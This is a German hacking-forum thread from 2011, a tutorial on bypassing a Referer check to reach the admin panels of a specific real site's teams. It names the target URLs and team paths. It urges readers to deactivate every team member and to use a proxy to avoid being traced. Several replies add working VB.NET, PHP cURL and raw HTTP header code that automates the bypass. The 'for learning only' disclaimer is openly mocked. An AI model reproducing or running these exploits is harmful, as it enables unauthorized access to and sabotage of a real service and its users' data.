HowTo: Hack Team-Administration

**Batzi** · 25.10.2011, 07:40

Mir ist gerade aufgefallen dass alle Teams so ziemlich das Gleiche System nutzen. "Programmiert" wurde es von wolltihrmichverarschen, der mal überhaupt keinerlei Kenntnisse besitzt

Das System dient in erster Linie dazu um die Anwesenheit eines Teammitgliedes zu ändern. Früher war es möglich, auch die Administration der Teamleiter (durch anhängen von admin.php) zu betreten um dann Beispielsweise Teammitglieder zu Löschen oder zu erstellen

Leider aber wurd der "Ersteller" bereits informiert und hat kurzerhand eine HTTP-Authentification hinzugefügt.

Wie kommt man nun auf die Administration?
Man gehe einfach auf der URL http://knuddels-magdeburg.de/bugs/checkout/.
Das Fett markierte Wort ist das jeweilige Team.

Folgende Teams habe ich mittlerweile herausgefunden:

foto
bugs
spiele
iphone
smileywars

Es erscheint eine Meldung, dass du die Seite nicht betreten darfst, klingt logisch. Wie aber bekommst du nun zugriff darauf?

Ganz einfach. Da wolltihrmichverarschen nicht der Hellste Kopf ist, hat er einfach nur eine Referrer-Überprüfung eingesetzt. Da das "System" als iFrame im Knuddels-Forum eingebunden wird, sollen die "Teammitglieder" direkte Einsicht bekommen, sobald diese das Forum öffnen.

Es gibt 3 einfache Schritte.

Schritt 1: Öffnen der Seite
Öffnet die Seite der Administration. Beispielsweise http://knuddels-magdeburg.de/bugs/checkout/.

Schritt 2: Öffnen des Forums
Auf der "Fehlerseite" erscheint eine verlinkung zum internen Forum. Öffnet diese und modifiziert nun in Realtime (Beispielsweise mittels Firebug) eine Verlinkung im Forum und tragt dort die URL der zuvor angewählten Administration ein (Beispielsweise http://knuddels-magdeburg.de/bugs/checkout/).

Klickt nun auf diese verlinkung und ihr erhaltet sofortigen Zugang, da als "Referrer" das jeweilige Forum gestored wurde.

Schritt 3: Macht was ihr wollt
Ihr könnt nun machen was ihr möchtet. Am besten alle Teammitglieder inaktiv melden oder was weiß ich

ip-adressen werden nicht gespeichert, des ist normal da er sich keinerlei Gedanken um der Sicherheit macht ^^ Notfalls nimmt man mal nen Proxy ^^

Aufgrund der großen Nachfrage, hier noch ein kleines Video-Tutorial:

[HIDE=10]

Wollte im Video anstatt "firebug" "Firefuck" sagen, verzeiht es mir x'D
[/HIDE]

Achja, vevor ichs vergesse:
Das Tutorial (Egal ob Text oder Video) ist ausschließlich zu lernzwecken gedacht und beabsichtigt keinerlei illegalen aktivitäten xDD

Mfg
Batzi

**Batzi** · 25.10.2011, 07:56

Firebug ist ein Addon für Firefox. Dies musst du installieren (https://addons.mozilla.org/de/firefox/addon/firebug/).

Es erscheint in der Rechten oberen Ecke ein "Käfer". Wenn du dort drauf klickst erscheint unten im Firefox ein Fensterchen. Dort gehst du auf das linke Icon (Der blaue Kasten) und klickst irgendein Link im Forum damit an. Dann kannst du die Verlinkung editieren (href)

**Chrissy** · 25.10.2011, 07:57

@Batzi

ok hab ich gefunden aber was bringt das ?

**Batzi** · 25.10.2011, 08:01

Was bringt was? Die live-bearbeitung des Links?
Wenn du genau lesen würdest, wüsstest du es.

Du erhälst nur Zugang zur Administration, wenn das Interne Forum als "Verweis" im Browser gespeichert wurde (HTTP-REFERRER). Diesen "Verweis" erhälst du indem du diesen setzt (Beispielsweise über den Firebug-Trick).

Man könnte nun auch ein PHP-Script erstellen, der dann das jeweilige Forum als Referrer mitsendet und die Administration beispielsweise über cURL zieht.

**Olaf** · 25.10.2011, 08:19

@xX Chriss Xx

Am besten lässt du es. Wie Batzi schon gesagt hat, musst du HTML-Kentnisse haben, um dieses TUT zu verstehen. Da du sie ja anscheinend nicht hast, bringt dir das TUT auch nichts, und du musst nichts weiter Posten. Wenn du jeden Schritt erklärt haben musst, dann kommst du mit dem Endergebnis sowieso nicht zurecht. Also lass es doch direkt, danke.

zum TUT: Nettes Tut. Gefällt mir gut, ist für manch jemanden sicherlich sehr nützlich. Weiter so.

**Mentos** · 25.10.2011, 10:02

Also ist das der offizielle Kram, den Knuddels benutzt?
Kann da nicht mal jemand die Daten dumpen?

**Batzi** · 25.10.2011, 10:04

Nein eine "Offizielle" Administration von Knuddels ist dies nicht.

wolltihrmichverarschen hat diese geproggt und stellt dies für die einzelnen Teams bereit.

**Diebspiel** · 25.10.2011, 13:13

Gutes Tut, echt ein noobiger Schutz - man braucht nur die URL.

VB.NET Lösung:

Code:

Dim client As New Net.WebClient()
        client.Headers.Add("Referer", "http://forum.knuddels.de/ubbthreads.php?ubb=showflat&Number=2123754")
        WebBrowser1.DocumentText = client.DownloadString("http://knuddels-magdeburg.de/bugs/checkout/")

Gelöschter Benutzer · 25.10.2011, 13:35

Gutes Tut, echt ein noobiger Schutz - man brauch nur den Referer ändern.

PHP Lösung:

PHP-Code:


<?php
$ch = curl_init("http://knuddels-magdeburg.de/bugs/checkout/");

curl_setopt($ch, CURLOPT_REFERER, "http://forum.knuddels.de/ubbthreads.php?ubb=showflat&Number=2123754");

curl_exec($ch);

curl_close($ch);
?>

Resultat: http://f1nn.net/knds.php

Man kann das ganze auch mit Live HTTP Replay realisieren. HTTP Header:

Code:

Host: knuddels-magdeburg.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://forum.knuddels.de/ubbthreads.php?ubb=showflat&Number=2123754

//Edit:
Die beiden Javascript Scripts müssen auch heruntergeladen werden, ansonsten läuft das ganze nicht

**Batzi** · 25.10.2011, 13:39

Und hier eine Beispielklasse in PHP. Natürlich muss die cURL extension für PHP installiert/aktiviert sein.

PHP-Code:


<?php
    /*
        Team-Administration Class
        @Author        Batzi
        @Version    1.0
    */
    
    class TeamCheckout {
        protected static $team        = "";
        protected static $referrer    = "";
        
        function setTeam($name) {
            self::$team = $name;
        }
        
        function output() {
            self::getForumLink();
            self::getAdministration();
        }
        
        function getForumLink() {
            $html = self::getRequest("http://knuddels-magdeburg.de/" . self::$team . "/checkout/");
            preg_match_all("/<a href='(.+)'>Forum<\/a>/Uis", $html, $data);
            self::$referrer = $data[1][0];
        }
        
        function getAdministration() {
            $html = self::getRequest("http://knuddels-magdeburg.de/" . self::$team . "/checkout/");
            print $html;
        }
        
        function getRequest($site) {
            $socket = curl_init();
            curl_setopt($socket, CURLOPT_REFERER,            self::$referrer);
            curl_setopt($socket, CURLOPT_URL,                $site);
            curl_setopt($socket, CURLOPT_RETURNTRANSFER,    1);
            return curl_exec($socket);
            curl_close($socket);
        }
    }
    
    header("Content-Type: text/html; charset=UTF-8");
    
    /* How to Use: */
    $team = new TeamCheckout;
    /*
        Gültige Teams:
            bugs
            smileywars
            iphone
            foto
    */
    $team->setTeam("foto");
    $team->output();
?>

U-Labs

Account-Boerse

U-IMG

Thema: HowTo: Hack Team-Administration